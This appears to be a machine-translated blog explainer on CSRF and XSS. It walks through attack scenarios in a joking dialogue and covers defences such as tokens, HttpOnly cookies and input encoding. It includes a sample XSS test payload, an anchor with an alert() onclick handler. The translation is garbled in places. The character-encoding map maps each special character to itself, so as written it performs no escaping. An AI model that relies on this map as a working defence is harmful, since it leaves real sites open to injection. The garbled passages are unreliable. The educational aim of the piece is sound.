What is CSRF?

CSRF/XSRF, full name: cross-site Request forgery, English: Cross-site request forgery An attack in which a trusted user sends unexpected requests to the server.

How did he carry out the attack?

Here’s an example:

  • User A opens A page, logs in, generates cookies, and stores them in the browser.
  • At this time A pop-up AD window, said to give A money, A did not think, point.
  • After A counts, he finds that the account is short of money… How did you do that?

If you think about it, if your payment operation is a GET request, all the parameters are displayed on your URL, and it’s easy to GET your URL.

When using the browser to initiate a request will automatically carry on your Cookie, forge your URL to initiate a request, you will be dumbfounded.

  • No, I’ll change it to a POST request.
  • Hacker: you be my fool? I’m a hacker. I’m not going to use the FROM form to submit a POST request, okay?
  • The site: WDNMD? What kind of defense is that?

Server: I have a way to defend!!

The server performs defense

Token

  • Server: I generate a token for the client, and you should not use it in a Cookie. Otherwise it’s on autopilot, and I’m out of ideas. (I have to save the token myself, save it in session, don’t give it to me next time I can’t find it.)
  • Client: ok, I give storage to localStorage inside, free of the total automatic carry. When the route hops, check whether the token exists in the localStorage.
  • Hacker: ouch feed? It doesn’t work? You can do it. I’ll look into it.

What is XSS?

XSS, full name: cross-site scripting, English: Cross-site scripting. An attacker can inject malicious client code. This automatically runs the malicious code when the victim accesses the site, allowing the attacker to impersonate the victim.

XSS can be divided into three categories: reflective, storage, and DOM-based.

Reflection type:

When a user clicks on a malicious link, submits a form, or enters a malicious site, the script is injected into the victim's site. The Web server will inject scripts, such as an error message, search results, and so on, back to the user's browser. Since the browser considers the response to be from a "trusted" server, it executes the script.Copy the code
  • User A’s page was injected with an A tag with A malicious link (similar to an AD).
  • User A clicked on the malicious link and entered the malicious website, which was able to obtain the Cookie of the user.

Storage type:

Injection scripts are stored permanently on the target server. When the browser requests the data, the script is passed back from the server and executed.Copy the code
  • A opened A website and found no other users on the site had commented on A malicious javaScript code.
  • The code was stored on the site’s servers.
  • This code will get the content of A’s comment and then display it on other websites.
  • “A” talking about privacy is all over the place.

Based on the DOM:

By modifying the original client code, the DOM environment of the victim's browser changes, resulting in the execution of the payload. That is, the page itself has not changed, but because the DOM environment has been maliciously modified, client code has been included in the page and accidentally executed.Copy the code
  • This attack is purely client-side.
  • Click the Submit button to add an A tag to the page.
  •   <a href onlick="alert(/xss/)">testLink</a>
Copy the code

The client performs defense

HttpOnly Prevents Cookie interception

Response header added:

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
Copy the code

This makes cookies inaccessible to the JavaScript Document.cookie API.

Cookies that persist server-side sessions do not need to be available to JavaScript.

Input inspection

  • Filters or encodes special characters such as < and > entered by the user.

    const decodingMap = { ‘<‘: ‘<‘, ‘>’: ‘>’, ‘”‘: ‘”‘, ‘&’: ‘&’, ‘ ‘: ‘\n’ }

Output check (server defense)

  • In addition to rich text output, you can use encoding or translation to defend against XSS attacks when a variable is output to an HTML page.

Conclusion:

Summary of CSRF and XSS first here, in fact, there are a lot of security issues, will continue to add later.